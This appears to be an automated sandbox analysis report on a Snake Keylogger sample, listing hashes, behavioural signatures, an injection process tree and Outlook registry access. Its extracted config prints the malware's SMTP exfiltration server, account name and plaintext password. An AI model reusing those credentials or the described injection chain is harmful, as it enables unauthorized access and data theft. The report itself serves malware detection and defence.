Analysis
- max time kernel: 148s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 14-05-2024 16:14

Static task: static1

Behavioral task: behavioral1
- Sample: 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe
- Resource: win7-20240215-en

Behavioral task: behavioral2
- Sample: 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe
- Resource: win10v2004-20240508-en
General
- Target: 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe
- Size: 30.7MB
- MD5: beec77b6b798c503ecf2284fa6026078
- SHA1: 85bae44e72a7b65820b0fff7fdfefa285fb2f7cd
- SHA256: 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a
- SHA512: 8db23bff39a52ac9f956397ceb71e1e313bcd228a24faf4a17760a768e8895f94a170704748f8a7546da63a650e69747c66d84c6a11dfd1908ba9d743b3266be
- SSDEEP: 393216:dQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mga96l+ZArYsFRl7D:d3on1HvSzxAMNaFZArYsf
Malware Config
Extracted
Family: snakekeylogger
- Protocol: smtp
- Host: mail.gbogboro.com
- Port: 587
- Username: [email protected]
- Password: Egoamaka@123
- https://scratchdreams.tk
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
Processes:
resource: behavioral2/memory/1760-33-0x0000000000400000-0x0000000000426000-memory.dmp
yara_rule: family_snakekeylogger
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes: regasm.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | regasm.exe
Key opened | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | regasm.exe
Key opened | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | regasm.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
21 | checkip.dyndns.org
-
Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.exe
description | pid | process | target process
PID 2700 set thread context of 1760 | 2700 | powershell.exe | regasm.exe
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes: powershell.exe, regasm.exe
pid | process
2700 | powershell.exe
2700 | powershell.exe
2700 | powershell.exe
2700 | powershell.exe
2700 | powershell.exe
2700 | powershell.exe
2700 | powershell.exe
2700 | powershell.exe
1760 | regasm.exe
1760 | regasm.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: powershell.exe, regasm.exe
description | pid | process
Token: SeDebugPrivilege | 2700 | powershell.exe
Token: SeDebugPrivilege | 1760 | regasm.exe
-
Suspicious use of WriteProcessMemory 22 IoCs
Processes: 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe, cmd.exe, powershell.exe, csc.exe
description | pid | process | target process
PID 4092 wrote to memory of 3548 | 4092 | 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe | cmd.exe
PID 4092 wrote to memory of 3548 | 4092 | 5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe | cmd.exe
PID 3548 wrote to memory of 2700 | 3548 | cmd.exe | powershell.exe
PID 3548 wrote to memory of 2700 | 3548 | cmd.exe | powershell.exe
PID 2700 wrote to memory of 932 | 2700 | powershell.exe | csc.exe
PID 2700 wrote to memory of 932 | 2700 | powershell.exe | csc.exe
PID 932 wrote to memory of 988 | 932 | csc.exe | cvtres.exe
PID 932 wrote to memory of 988 | 932 | csc.exe | cvtres.exe
PID 2700 wrote to memory of 3504 | 2700 | powershell.exe | AddInProcess32.exe
PID 2700 wrote to memory of 3504 | 2700 | powershell.exe | AddInProcess32.exe
PID 2700 wrote to memory of 3504 | 2700 | powershell.exe | AddInProcess32.exe
PID 2700 wrote to memory of 1672 | 2700 | powershell.exe | installutil.exe
PID 2700 wrote to memory of 1672 | 2700 | powershell.exe | installutil.exe
PID 2700 wrote to memory of 1672 | 2700 | powershell.exe | installutil.exe
PID 2700 wrote to memory of 1760 | 2700 | powershell.exe | regasm.exe
PID 2700 wrote to memory of 1760 | 2700 | powershell.exe | regasm.exe
PID 2700 wrote to memory of 1760 | 2700 | powershell.exe | regasm.exe
PID 2700 wrote to memory of 1760 | 2700 | powershell.exe | regasm.exe
PID 2700 wrote to memory of 1760 | 2700 | powershell.exe | regasm.exe
PID 2700 wrote to memory of 1760 | 2700 | powershell.exe | regasm.exe
PID 2700 wrote to memory of 1760 | 2700 | powershell.exe | regasm.exe
PID 2700 wrote to memory of 1760 | 2700 | powershell.exe | regasm.exe
-
outlook_office_path 1 IoCs
Processes: regasm.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | regasm.exe
-
outlook_win_path 1 IoCs
Processes: regasm.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | regasm.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a.exe"
  - Suspicious use of WriteProcessMemory
  PID: 4092
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand <base64-encoded PowerShell command omitted>"
    - Suspicious use of WriteProcessMemory
    PID: 3548
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -EncodedCommand <base64-encoded PowerShell command omitted>
      - Suspicious use of SetThreadContext
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2700
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lavqraz4\lavqraz4.cmdline"
        - Suspicious use of WriteProcessMemory
        PID: 932
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7232.tmp" "c:\Users\Admin\AppData\Local\Temp\lavqraz4\CSC6B9C31A59D0C418BB68D15F7CDF64390.TMP"
          PID: 988
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        PID: 3504
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
        PID: 1672
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        - Accesses Microsoft Outlook profiles
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - outlook_office_path
        - outlook_win_path
        PID: 1760
Network
MITRE ATT&CK Enterprise v15
Downloads